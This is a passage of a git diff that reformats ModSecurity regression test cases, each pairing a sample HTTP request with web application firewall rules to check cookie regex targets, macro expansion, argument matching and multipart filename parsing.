"SecRequestBodyAccess On", + "SecRule REQUEST_HEADERS:Content-Type \"application/json\" \"id:'200001',phase:1,t:none,t:lowercase,pass,nolog,ctl:requestBodyProcessor=JSON\"", + "SecRule ARGS \"asdf\" \"id:'200441',phase:3,log\"" ] } ] diff --git a/test/test-cases/regression/issue-1591.json b/test/test-cases/regression/issue-1591.json index 2b32aa29a2..4de1ad2629 100644 --- a/test/test-cases/regression/issue-1591.json +++ b/test/test-cases/regression/issue-1591.json @@ -1,119 +1,140 @@ [ -{ - "enabled": 1, - "version_min": 209000, - "version_max": -1, - "title": "Regular expressions in rule targets not respected (1/3)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1591", - "gihub_issue": 394, - "client": { - "ip": "200.249.12.31", - "port": 2313 - }, - "server": { - "ip": "200.249.12.31", - "port": 80 - }, - "request": { - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length": "1539", - "Cookie": "__utma=1.32168570.12572608.1259628772.2&__utmb=1.4.10.1259628772&" + { + "enabled": 1, + "version_min": 209000, + "version_max": -1, + "title": "Regular expressions in rule targets not respected (1/3)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1591", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "body": "", - "method": "GET", - "http_version": 1.1 - }, - "response": { - "headers": "", - "body": "" - }, - "expected": { - "debug_log": "Rule returned 0." - }, - "rules": [ - "SecRuleEngine On", - "SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/ \"321\" \"id:1,log\"" - ] -}, -{ - "enabled": 1, - "version_min": 209000, - "version_max": -1, - "title": "Regular expressions in rule targets not respected (2/3)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1591", - "gihub_issue": 394, - "client": { - "ip": "200.249.12.31", - "port": 2313 - }, - "server": { - "ip": "200.249.12.31", - "port": 80 - }, - "request": { - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length": "1539", - "Cookie": "__utma=1.32168570.12572608.1259628772.2&__utmb=1.4.10.1259628772&" + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "body": "", - "method": "GET", - "http_version": 1.1 - }, - "response": { - "headers": "", - "body": "" - }, - "expected": { - "debug_log": "Rule returned 1." - }, - "rules": [ - "SecRuleEngine On", - "SecRule REQUEST_COOKIES \"321\" \"id:1,log\"" - ] -}, -{ - "enabled": 1, - "version_min": 209000, - "version_max": -1, - "title": "Regular expressions in rule targets not respected (3/3)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1591", - "gihub_issue": 394, - "client": { - "ip": "200.249.12.31", - "port": 2313 - }, - "server": { - "ip": "200.249.12.31", - "port": 80 - }, - "request": { - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length": "1539", - "Cookie": "__utma=1.32168570.12572608.1259628772.2&__utmb=1.4.10.1259628772&" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "1539", + "Cookie": "__utma=1.32168570.12572608.1259628772.2&__utmb=1.4.10.1259628772&" + }, + "uri": "", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "body": "", - "method": "GET", - "http_version": 1.1 - }, - "response": { - "headers": "", - "body": "" + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Rule returned 0.", + "http_code": 200 + }, + "rules": [ + "SecRuleEngine On", + "SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/ \"321\" \"id:1,log\"" + ] }, - "expected": { - "debug_log": "Variable: REQUEST_HEADERS:Content-Length" + { + "enabled": 1, + "version_min": 209000, + "version_max": -1, + "title": "Regular expressions in rule targets not respected (2/3)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1591", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "1539", + "Cookie": "__utma=1.32168570.12572608.1259628772.2&__utmb=1.4.10.1259628772&" + }, + "uri": "", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Rule returned 1.", + "http_code": 200 + }, + "rules": [ + "SecRuleEngine On", + "SecRule REQUEST_COOKIES \"321\" \"id:1,log\"" + ] }, - "rules": [ - "SecRuleEngine On", - "SecRule REQUEST_HEADERS:'/(Content-Length|Transfer-Encoding)/' \"321\" \"id:1,log\"" - ] -} + { + "enabled": 1, + "version_min": 209000, + "version_max": -1, + "title": "Regular expressions in rule targets not respected (3/3)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1591", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "1539", + "Cookie": "__utma=1.32168570.12572608.1259628772.2&__utmb=1.4.10.1259628772&" + }, + "uri": "", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Variable: REQUEST_HEADERS:Content-Length", + "http_code": 200 + }, + "rules": [ + "SecRuleEngine On", + "SecRule REQUEST_HEADERS:'/(Content-Length|Transfer-Encoding)/' \"321\" \"id:1,log\"" + ] + } ] diff --git a/test/test-cases/regression/issue-1725.json b/test/test-cases/regression/issue-1725.json index afd7c794e2..16dcf023b8 100644 --- a/test/test-cases/regression/issue-1725.json +++ b/test/test-cases/regression/issue-1725.json @@ -1,42 +1,48 @@ [ -{ - "enabled": 1, - "version_min": 209000, - "version_max": -1, - "title": "Macro expansion on msg and logdata does not work for DURATION", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1725", - "gihub_issue": 1725, - "client": { - "ip": "200.249.12.31", - "port": 2313 - }, - "server": { - "ip": "200.249.12.31", - "port": 80 - }, - "request": { - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length": "1539", - "Cookie": "__utma=1.32168570.12572608.1259628772.2&__utmb=1.4.10.1259628772&" + { + "enabled": 1, + "version_min": 209000, + "version_max": -1, + "title": "Macro expansion on msg and logdata does not work for DURATION", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1725", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "body": "", - "method": "GET", - "http_version": 1.1, - "uri": "/test" - }, - "response": { - "headers": "", - "body": "" - }, - "expected": { - "debug_log": "\/test; 0.[0-9]+; 0.[0-9]+;" - }, - "rules": [ - "SecRuleEngine On", - "SecRule DURATION \"@unconditionalMatch\" \"phase:2,id:10001,log,auditlog,pass,msg:'%{REQUEST_URI}; %{MATCHED_VAR}; %{DURATION};',logdata:'%{REQUEST_URI}; %{MATCHED_VAR}; %{DURATION};'\"" - ] -} + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "1539", + "Cookie": "__utma=1.32168570.12572608.1259628772.2&__utmb=1.4.10.1259628772&" + }, + "uri": "/test", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "/test; 0.[0-9]+; 0.[0-9]+;", + "http_code": 200 + }, + "rules": [ + "SecRuleEngine On", + "SecRule DURATION \"@unconditionalMatch\" \"phase:2,id:10001,log,auditlog,pass,msg:'%{REQUEST_URI}; %{MATCHED_VAR}; %{DURATION};',logdata:'%{REQUEST_URI}; %{MATCHED_VAR}; %{DURATION};'\"" + ] + } ] diff --git a/test/test-cases/regression/issue-1743.json b/test/test-cases/regression/issue-1743.json index 5e2b2fad35..ed08f62cd5 100644 --- a/test/test-cases/regression/issue-1743.json +++ b/test/test-cases/regression/issue-1743.json @@ -1,74 +1,88 @@ [ -{ - "enabled": 1, - "version_min": 209000, - "version_max": -1, - "title": "Regex match does not work when arg ends with unescaped equal char (1/2)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1743", - "gihub_issue": 1743, - "client": { - "ip": "200.249.12.31", - "port": 2313 + { + "enabled": 1, + "version_min": 209000, + "version_max": -1, + "title": "Regex match does not work when arg ends with unescaped equal char (1/2)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1743", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + + }, + "uri": "/?x=foo%3d", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Rule returned 1", + "error_log": "Value: `foo='", + "http_code": 403 + }, + "rules": [ + "SecRuleEngine On", + "SecRule ARGS \"foo?=\" \"phase:2,id:1,capture,t:none,t:lowercase,deny,msg:'XSS Attack Detected',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'\"" + ] }, - "server": { - "ip": "200.249.12.31", - "port": 80 - }, - "request": { - "uri":"/?x=foo%3d", - "headers": "", - "body": "", - "method": "GET", - "http_version": 1.1 - }, - "response": { - "headers": "", - "body": "" - }, - "expected": { - "debug_log": "Rule returned 1", - "error_log": "Value: `foo='", - "http_code": 403 - }, - "rules": [ - "SecRuleEngine On", - "SecRule ARGS \"foo?=\" \"phase:2,id:1,capture,t:none,t:lowercase,deny,msg:'XSS Attack Detected',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'\"" - ] -}, -{ - "enabled": 1, - "version_min": 209000, - "version_max": -1, - "title": "Regex match does not work when arg ends with unescaped equal char (2/2)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1743", - "gihub_issue": 1743, - "client": { - "ip": "200.249.12.31", - "port": 2313 - }, - "server": { - "ip": "200.249.12.31", - "port": 80 - }, - "request": { - "uri":"/?x=foo=", - "headers": "", - "body": "", - "method": "GET", - "http_version": 1.1 - }, - "response": { - "headers": "", - "body": "" - }, - "expected": { - "debug_log": "Rule returned 1", - "error_log": "Value: `foo='", - "http_code": 403 - }, - "rules": [ - "SecRuleEngine On", - "SecRule ARGS \"foo?=\" \"phase:2,id:1,capture,t:none,t:lowercase,deny,msg:'XSS Attack Detected',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'\"" - ] -} + { + "enabled": 1, + "version_min": 209000, + "version_max": -1, + "title": "Regex match does not work when arg ends with unescaped equal char (2/2)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1743", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + + }, + "uri": "/?x=foo=", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Rule returned 1", + "error_log": "Value: `foo='", + "http_code": 403 + }, + "rules": [ + "SecRuleEngine On", + "SecRule ARGS \"foo?=\" \"phase:2,id:1,capture,t:none,t:lowercase,deny,msg:'XSS Attack Detected',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'\"" + ] + } ] diff --git a/test/test-cases/regression/issue-1785.json b/test/test-cases/regression/issue-1785.json index ba252b144f..124f104dff 100644 --- a/test/test-cases/regression/issue-1785.json +++ b/test/test-cases/regression/issue-1785.json @@ -4,7 +4,7 @@ "version_min": 209000, "version_max": -1, "title": "Should libmodsec pass action clear m_actions?", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1152", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1152", "client": { "ip": "200.249.12.31", "port": 2313 @@ -17,7 +17,7 @@ "headers": { "Host": "net.tutsplus.com", "User-Agent": "", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -27,16 +27,21 @@ "Pragma": "no-cache", "Cache-Control": "no-cache" }, - "uri": "\/test.pl?foo=bar", + "uri": "/test.pl?foo=bar", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", + "Content-Type": "text/xml; charset=utf-8\n\r", "Content-Length": "length\n\r" - } + }, + "body": [ + "" + ] }, "expected": { "http_code": 403 diff --git a/test/test-cases/regression/issue-1812.json b/test/test-cases/regression/issue-1812.json index 47c51933bd..417a11d40e 100644 --- a/test/test-cases/regression/issue-1812.json +++ b/test/test-cases/regression/issue-1812.json @@ -4,7 +4,7 @@ "version_min": 209000, "version_max": -1, "title": "Converting £ (%C2%A3) from query string", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1812", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1812", "client": { "ip": "200.249.12.31", "port": 2313 @@ -17,7 +17,7 @@ "headers": { "Host": "net.tutsplus.com", "User-Agent": "", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -27,19 +27,25 @@ "Pragma": "no-cache", "Cache-Control": "no-cache" }, - "uri": "\/test.pl?foo=£&bar=%C2%A3", + "uri": "/test.pl?foo=£&bar=%C2%A3", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", + "Content-Type": "text/xml; charset=utf-8\n\r", "Content-Length": "length\n\r" - } + }, + "body": [ + "" + ] }, "expected": { - "debug_log": "\/test.pl\\?foo=\\\\xc2\\\\xa3&bar=\\\\xc2\\\\xa3" + "debug_log": "/test.pl\\?foo=\\\\xc2\\\\xa3&bar=\\\\xc2\\\\xa3", + "http_code": 200 }, "rules": [ "SecRuleEngine On", diff --git a/test/test-cases/regression/issue-1825.json b/test/test-cases/regression/issue-1825.json index ca9d4ca435..126826c950 100644 --- a/test/test-cases/regression/issue-1825.json +++ b/test/test-cases/regression/issue-1825.json @@ -1,28 +1,28 @@ -[ - { - "enabled":1, - "version_min":300000, - "title":"multipart Content-Disposition should allow filename* field (1/7)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" +[ + { + "enabled": 1, + "version_min": 300000, + "title": "multipart Content-Disposition should allow filename* field (1/7)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" }, - "uri":"/", - "method":"POST", - "body":[ + "uri": "/", + "method": "POST", + "body": [ "----------------------------756b6d74fa1a8ee2\n", "Content-Disposition: form-data; name=\"name\"\n", "\n", @@ -35,42 +35,47 @@ "----------------------------756b6d74fa1a8ee2--\n" ] }, - "response":{ - "headers":"", - "body":"" + "response": { + "headers": { + + }, + "body": [ + "" + ] }, - "expected":{ - "debug_log":"Target value: \"03CB1664.txt\" \\(Variable: MULTIPART_FILENAME" + "expected": { + "debug_log": "Target value: \"03CB1664.txt\" \\(Variable: MULTIPART_FILENAME", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule MULTIPART_FILENAME \"@contains 0\" \"id:1,phase:2,pass,t:trim\"" ] }, - { - "enabled":1, - "version_min":300000, - "title":"multipart Content-Disposition should allow filename* field (2/7)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" + { + "enabled": 1, + "version_min": 300000, + "title": "multipart Content-Disposition should allow filename* field (2/7)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" }, - "uri":"/", - "method":"POST", - "body":[ + "uri": "/", + "method": "POST", + "body": [ "----------------------------756b6d74fa1a8ee2\n", "Content-Disposition: form-data; name=\"name\"\n", "\n", @@ -83,42 +88,47 @@ "----------------------------756b6d74fa1a8ee2--\n" ] }, - "response":{ - "headers":"", - "body":"" + "response": { + "headers": { + + }, + "body": [ + "" + ] }, - "expected":{ - "debug_log":"Target value: \"ab0-_xy.txt\" \\(Variable: MULTIPART_FILENAME" + "expected": { + "debug_log": "Target value: \"ab0-_xy.txt\" \\(Variable: MULTIPART_FILENAME", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule MULTIPART_FILENAME \"@contains 0\" \"id:1,phase:2,pass,t:trim\"" ] }, - { - "enabled":1, - "version_min":300000, - "title":"multipart Content-Disposition should allow filename* field (3/7)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" + { + "enabled": 1, + "version_min": 300000, + "title": "multipart Content-Disposition should allow filename* field (3/7)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" }, - "uri":"/", - "method":"POST", - "body":[ + "uri": "/", + "method": "POST", + "body": [ "----------------------------756b6d74fa1a8ee2\n", "Content-Disposition: form-data; name=\"name\"\n", "\n", @@ -131,42 +141,47 @@ "----------------------------756b6d74fa1a8ee2--\r\n" ] }, - "response":{ - "headers":"", - "body":"" + "response": { + "headers": { + + }, + "body": [ + "" + ] }, - "expected":{ - "debug_log":"Warning: no filename= but filename*" + "expected": { + "debug_log": "Warning: no filename= but filename*", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule MULTIPART_FILENAME \"@contains 0\" \"id:1,phase:2,pass,t:trim\"" ] }, - { - "enabled":1, - "version_min":300000, - "title":"multipart Content-Disposition should allow filename* field (4/7)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" + { + "enabled": 1, + "version_min": 300000, + "title": "multipart Content-Disposition should allow filename* field (4/7)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" }, - "uri":"/", - "method":"POST", - "body":[ + "uri": "/", + "method": "POST", + "body": [ "----------------------------756b6d74fa1a8ee2\n", "Content-Disposition: form-data; name=\"name\"\n", "\n", @@ -179,42 +194,47 @@ "----------------------------756b6d74fa1a8ee2--\n" ] }, - "response":{ - "headers":"", - "body":"" + "response": { + "headers": { + + }, + "body": [ + "" + ] }, - "expected":{ - "debug_log":"Multipart: Invalid Content-Disposition header \\(-16" + "expected": { + "debug_log": "Multipart: Invalid Content-Disposition header \\(-16", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule MULTIPART_FILENAME \"@contains 0\" \"id:1,phase:2,pass,t:trim\"" ] }, - { - "enabled":1, - "version_min":300000, - "title":"multipart Content-Disposition should allow filename* field (5/7)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" + { + "enabled": 1, + "version_min": 300000, + "title": "multipart Content-Disposition should allow filename* field (5/7)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" }, - "uri":"/", - "method":"POST", - "body":[ + "uri": "/", + "method": "POST", + "body": [ "----------------------------756b6d74fa1a8ee2\n", "Content-Disposition: form-data; name=\"name\"\n", "\n", @@ -227,42 +247,47 @@ "----------------------------756b6d74fa1a8ee2--\n" ] }, - "response":{ - "headers":"", - "body":"" + "response": { + "headers": { + + }, + "body": [ + "" + ] }, - "expected":{ - "debug_log":"Multipart: Invalid Content-Disposition header \\(-17" + "expected": { + "debug_log": "Multipart: Invalid Content-Disposition header \\(-17", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule MULTIPART_FILENAME \"@contains 0\" \"id:1,phase:2,pass,t:trim\"" ] }, - { - "enabled":1, - "version_min":300000, - "title":"multipart Content-Disposition should allow filename* field (6/7)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" + { + "enabled": 1, + "version_min": 300000, + "title": "multipart Content-Disposition should allow filename* field (6/7)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" }, - "uri":"/", - "method":"POST", - "body":[ + "uri": "/", + "method": "POST", + "body": [ "----------------------------756b6d74fa1a8ee2\n", "Content-Disposition: form-data; name=\"name\"\n", "\n", @@ -275,42 +300,47 @@ "----------------------------756b6d74fa1a8ee2--\n" ] }, - "response":{ - "headers":"", - "body":"" + "response": { + "headers": { + + }, + "body": [ + "" + ] }, - "expected":{ - "debug_log":"Multipart: Invalid Content-Disposition header \\(-18" + "expected": { + "debug_log": "Multipart: Invalid Content-Disposition header \\(-18", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule MULTIPART_FILENAME \"@contains 0\" \"id:1,phase:2,pass,t:trim\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"multipart Content-Disposition should allow filename* field (7/7)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" + "enabled": 1, + "version_min": 300000, + "title": "multipart Content-Disposition should allow filename* field (7/7)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" }, - "uri":"/", - "method":"POST", - "body":[ + "uri": "/", + "method": "POST", + "body": [ "----------------------------756b6d74fa1a8ee2\n", "Content-Disposition: form-data; name=\"name\"\n", "\n", @@ -323,17 +353,20 @@ "----------------------------756b6d74fa1a8ee2--\n" ] }, - "response":{ - "headers":"", - "body":"" + "response": { + "headers": { + + }, + "body": [ + "" + ] }, - "expected":{ - "http_code":200 + "expected": { + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQBODY_ERROR \"!@eq 0\" \"id:1,phase:2,deny,status:403\"" ] } ] - diff --git a/test/test-cases/regression/issue-1831.json b/test/test-cases/regression/issue-1831.json index 773a0eec97..4f8366d947 100644 --- a/test/test-cases/regression/issue-1831.json +++ b/test/test-cases/regression/issue-1831.json @@ -4,7 +4,7 @@ "version_min": 209000, "version_max": -1, "title": "Invalid actions break CRS 3.1 on rule 912160 - 1", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1830", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1830", "client": { "ip": "200.249.12.31", "port": 2313 @@ -17,7 +17,7 @@ "headers": { "Host": "net.tutsplus.com", "User-Agent": "", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -27,19 +27,25 @@ "Pragma": "no-cache", "Cache-Control": "no-cache" }, - "uri": "\/test.pl?foo=£&bar=%C2%A3", + "uri": "/test.pl?foo=£&bar=%C2%A3", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", + "Content-Type": "text/xml; charset=utf-8\n\r", "Content-Length": "length\n\r" - } + }, + "body": [ + "" + ] }, "expected": { - "debug_log": "\\\\xc2\\\\xa3" + "debug_log": "\\\\xc2\\\\xa3", + "http_code": 200 }, "rules": [ "SecRuleEngine On", @@ -51,7 +57,7 @@ "version_min": 209000, "version_max": -1, "title": "Invalid actions break CRS 3.1 on rule 912160 - 2", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1830", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1830", "client": { "ip": "200.249.12.31", "port": 2313 @@ -64,7 +70,7 @@ "headers": { "Host": "net.tutsplus.com", "User-Agent": "", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -74,16 +80,21 @@ "Pragma": "no-cache", "Cache-Control": "no-cache" }, - "uri": "\/test.pl?foo=£&bar=%C2%A3", + "uri": "/test.pl?foo=£&bar=%C2%A3", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", + "Content-Type": "text/xml; charset=utf-8\n\r", "Content-Length": "length\n\r" - } + }, + "body": [ + "" + ] }, "expected": { "http_code": 200 @@ -101,7 +112,7 @@ "version_min": 209000, "version_max": -1, "title": "Invalid actions break CRS 3.1 on rule 912160 - 3", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1830", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1830", "client": { "ip": "200.249.12.31", "port": 2313 @@ -114,7 +125,7 @@ "headers": { "Host": "net.tutsplus.com", "User-Agent": "", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -124,20 +135,25 @@ "Pragma": "no-cache", "Cache-Control": "no-cache" }, - "uri": "\/test.pl?foo=£&bar=%C2%A3", + "uri": 